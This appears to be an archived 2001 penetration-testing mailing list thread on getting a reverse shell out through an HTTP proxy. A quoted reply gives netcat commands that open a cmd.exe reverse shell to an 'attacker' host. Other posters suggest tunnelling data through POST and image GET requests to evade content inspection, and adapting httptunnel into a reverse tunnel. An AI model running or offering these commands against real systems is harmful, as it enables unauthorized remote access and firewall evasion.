Hi, I can confirm that it is possible to hack nocrew's httptunnel program to provide a reverse tunnel. There is no reason that this would not work over a http proxy. Once you have a reverse tunnel set up, you can use netcat to patch in a shell (or even build that functionality into the tunneling software). httptunnel (which provides a 'forward' tunnel) can be downloaded from : http://www.nocrew.org/software/httptunnel.html All it takes is a bit of code grafting between htc.c and hts.c. Regards, Dave > -----Original Message----- > From: Frank Knobbe [SMTP:FKnobbeat_private] > Sent: 19 October 2001 02:56 > To: 'GrandmastrPlagueat_private'; vdalesandroat_private > Cc: 'pen-testat_private' > Subject: RE: Reverse Http Shell Solution > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > > -----Original Message----- > > From: GrandmastrPlagueat_private [mailto:GrandmastrPlagueat_private] > > Sent: Thursday, October 18, 2001 2:02 PM > > > > It seems like this question has been asked a million times > > before, but here goes the same old answer again... use netcat > > On attacker machine: > > nc -l -p 80 > > On victim machine: > > nc -d -e cmd.exe attacker 80 > > > > Make sure you set up the listening machine first. > > > I believe Vinícius meant that there is no way for a straight through > connection as netcat would establish, but instead the requirement to > send GET requests to the proxy which will fetch a page for you. > Netcat won't do that. You would have to have a reverse shell that > operates on a HTTP GET and PUT basis. > > You could modify netcat to do that. Instead of using TCP/UDP > connections, you can replace that mechanism with HTTP GET and PUT > ways of shuffling data, pumping that back to stdin/stdout. The only > catch is to fetch the data correctly as some firewalls will do > content inspection. One way to get around that is to pump data with > POSTs to a form as normal, but receive data via GET's from images in > the web page, or just request for images a'la http://h4x0r/data.gif. > > Regards, > Frank > > -----BEGIN PGP SIGNATURE----- > Version: PGP Personal Privacy 6.5.8 > Comment: PGP or S/MIME (X.509) encrypted email preferred. > > iQA/AwUBO8+ILpytSsEygtEFEQIpdACfcW0ho5zq0dzoNYY0dWkId3qhhosAnjOo > 7M3sMCeCgjkYKDpMousASMQa > =MS16 > -----END PGP SIGNATURE----- > > -------------------------------------------------------------------------- > -- > This list is provided by the SecurityFocus Security Intelligence Alert > (SIA) > Service. For more information on SecurityFocus' SIA service which > automatically alerts you to the latest security vulnerabilities please > see: > https://alerts.securityfocus.com/ ----------------------------------------------- Any opinions expressed in this message are those of the individual and not necessarily the company. This message and any files transmitted with it are confidential and solely for the use of the intended recipient. If you are not the intended recipient or the person responsible for delivering to the intended recipient, be advised that you have received this message in error and that any use is strictly prohibited. Sapphire Technologies Ltd http://www.sapphire.net ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Fri Oct 19 2001 - 10:15:26 PDT
